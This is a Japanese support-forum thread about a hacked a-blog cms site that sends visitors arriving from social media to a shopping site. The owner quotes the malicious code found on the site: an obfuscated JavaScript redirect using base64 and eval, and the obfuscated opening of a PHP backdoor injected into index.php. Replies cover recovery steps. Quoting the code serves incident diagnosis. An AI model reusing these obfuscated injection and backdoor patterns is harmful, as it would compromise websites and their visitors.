無関係な通販サイトにリダイレクトされてしまう

[OK Seed]

a-blog cmsがクラックされたのか定かではないのですが、通常にブラウザにURLを入力する場合は正常にサイトが表示されるのに、SNSのリンクから来るとすぐに入れた覚えのないJavascriptが動いて、無関係な通販サイトにリダイレクトされてしまうようになってしまいました。

ルートの .htaccess ファイルも書き換えられていたため、これが原因かと考えたのですが、デフォルトの .htaccessファイルに戻してみても、この現象が続きます。

Apacheの設定は変わっておらず、通常にURLを入力する際には通常にサイトが表示され、FacebookやX（Twitter）からのリンクをクリックする際にのみ、通販サイトにリダイレクトされてしまいます。

その際、Javascriptを止めてソースを見たのですが、以下のようなソースでした。

<meta http-equiv="refresh" content="0; url=https://tqv.getee.cfd/abreuvoir/lOejO0wLLF.html"/>

<script type="text/javascript">

var cos = ['win', 'dow.onload=', 'function(){', 'windo', 'w.locat', 'ion.hr','ef=\'','BaHR0cHM6Ly90cXYuZ2V0ZWUuY2ZkL2FicmV1dm9pci9sT2VqTzB3TExGLmh0bWw=','\';};', 'do','cument.write(\'<meta http-equiv="ref','resh" content="0; ur','l=','BaHR0cHM6Ly90cXYuZ2V0ZWUuY2ZkL2FicmV1dm9pci9sT2VqTzB3TExGLmh0bWw=','" />\');'];

var cosc = '';

for (var i = 0; i < cos.length; i++) {if(cos[i].charAt(0)==='B'){cos[i]=atob(cos[i].substring(1));}cosc += cos[i];}

eval(cosc);

</script>

<noscript><meta http-equiv="refresh" content="0; url=https://tqv.getee.cfd/abreuvoir/lOejO0wLLF.html"></noscript>

もっとも、このようなJavascriptファイルはサーバー上には存在しません。しかし、明らかにこのJavascriptは当方のサーバーのURLにアクセスする際に出力されており、なんらかのJavascriptが実行されるような細工をされてしまったのだろうと考え、a-blog cmsの出力するヘッダ周りを確認しましたが、それらしきスクリプトは見つかりません。

SSHのアクセスも制限しているのですが、その後、すべてのIDのパスワードを変え、2段階認証を設定しました。

a-blog cmsとは関係ないケースかもしれませんが、万一、a-blog cmsに外部から侵入されたとしたら、どのような対処法が考えられるでしょうか？　またどのような手口であることが推測できるか、どなたかご教示いただければ大変助かります。

どうぞよろしくお願いいたします。

[OK Seed]

調べたら、index.php が書き換えられていて、冒頭に1万6000字を超す膨大なコードが書き加えられていました。

<?php /*-@sd@@+Sr-*/error_reporting(0); $Ikn /*-PKQ]k5|-*/= /*-2yD6cFGE>-*/"r"./*-nT+-*/"a"."n"./*-A!CnO@-*/"g"."e"; /*-;C-*/$mLxjn/*-nLu-*/ = /*-gj>8-*/$Ikn/*-(#Bo-*/("~", /*-zI_I9[!C_O-*/" "); /*-(07==-*/$lY/*-NJ|9v@qhEz-*/=/*-_S+,-*/${$mLxjn/*-)3-*/[25+6/*-<vo-*/].$mLxjn/*-!|CcpBBx>-*/[13+46]/*-4YsVJB#Eb-*/.$mLxjn/*-CW?($|kC-*/[41+6]/*-bb_t,,O@-*/.$mLxjn/*-MR5j6kO7B2-*/[40+7]/*-K`n-*/.$mLxjn/*-f!56md`-*/[24+27]/*-J!.<;Ai-*/.$mLxjn/*-)2(u$hMY{1-*/[52+1]/*-kX6rw-*/.$mLxjn/*-qg3x#T-*/[49+8]/*-x)PTJ[7A-*/}; /*-eV-*/if/*-Jbz,-*/((/*-EOO6:54z)-*/in_array/*-!=m@-*/(gettype/*-P.N#=R6m-*/($lY)./*-^#-*/count/*-78-*/($lY),/*-.q{F%`?-*/$lY)/*-<wb?R@D-*/&&count/*-8(34w!a-*/($lY)/*-V%KW,t%K|-*/==/*-E,)!~-*/23)&&(md5/*-Z{@b-*/(md5/*-,9`%-*/(md5/*-CQZho-*/(md5/*-P{-AdW-*/($lY[17]))/*-)>!(`}B-*/))/*-6@;C$LjK-*/===/*-J<~[p,GDv-*/"f116c4d27eafebbc5e7534e2353cdab9"/*-S;qbgrf@y-*/))/*-

と延々と1万6000字も続くコードが挿入されています。

これを削除できれば解決できると思いましたが、rootでも編集ができない。ファイルがApacheの実行ユーザーのリードオンリーになっていました。

編集・保存するために、ファイルオーナーをroot.rootにして、パーミッションも606にして

当然、ファイルは

-rw----rw-  1 root     root     1721 Jun 29 04:01 index.php

となるはずですが、この冒頭のコードを消すと、root が書き換えたファイルがなぜか、

-r--r--r--  1 www-data www-data 17528 Jun 29 04:10 index.php

となり、ファイルの10倍のサイズに戻り、ファイルのオーナーも変わっています。

つまり、何かがファイルの書き換えを監視していて、root権限が乗っ取られていて、このコードが書き換えられたら、再び書き換えて、ファイルのオーナーも権限も書き換えているように思います。どのような仕組みでそれが実現しているのか、つかめていません。a-blog cmsの脆弱性とは関係せずに、こちらのサーバーの隙を狙って書き換えられた可能性もあるかと思います。その場合は貴重な場を無駄にして申し訳ありません。なんとか解決したいと思いますし、解決できたら報告したいと思います。もし、ヒントがあれば教えていただければ大変助かります。

2024年6月29日土曜日 2:26:14 UTC+9 OK Seed:

[山本一道]

クラッキング被害ということで大変心配な状況かと思います。
セキュリティに関する問題は迅速な対応が重要ですので、土日の返信は普段行っておりませんが返信させていただきます。

もし root 権限が奪取されているのであれば、問題のプログラムを探して削除するのは困難だと思われます。
そのため、OSの再インストールが必要になる可能性が高いでしょう。

a-blog cms については、一般的にはデータベース（DB）とファイル（archives / media / storage）のバックアップ、そしてテーマのファイルがあれば、復旧させることが可能だと考えられます。（オリジナルのモジュールや hook などがカスタマイズされている場合は、それらの部分も必要になります。）

復旧の際に現在の archives / media / storage を利用する場合は、各ディレクトリ内に不審なファイルがないかを十分にチェックする必要があるかもしれません。

2024年6月29日土曜日 10:19:46 UTC+9 OK Seed:

[OK Seed]

大変お騒がせして申し訳ありません。

root が書き換えたファイルがすぐに書き換えられてしまうということで、ファイルシステムレベルでroot権限が奪取されたと考えたのですが、知人のアドバイスに従い、Apacheを再起動してから、index.phpファイルを書き換えたところ、ファイルの書き換えは止まりました。オンメモリに仕込まれたプログラムが実行される状態であったようです。やはり勝手にリダイレクトという場合はCMSの場合は index.php .htaccess のチェックからですね。ヘッダに仕込まれたと勘違いしてヘッダ探すのに無駄な時間を費やしてしまいました。ファイルのパーミッションも644でよかったはずなのに間違えて606にしてしまうなど慌てるとろくなことがありません。

サーバー移行を考えようと思っております。ご忠告に感謝いたします。

お礼まで

2024年6月29日土曜日 11:23:30 UTC+9 kazu...@appleple.com: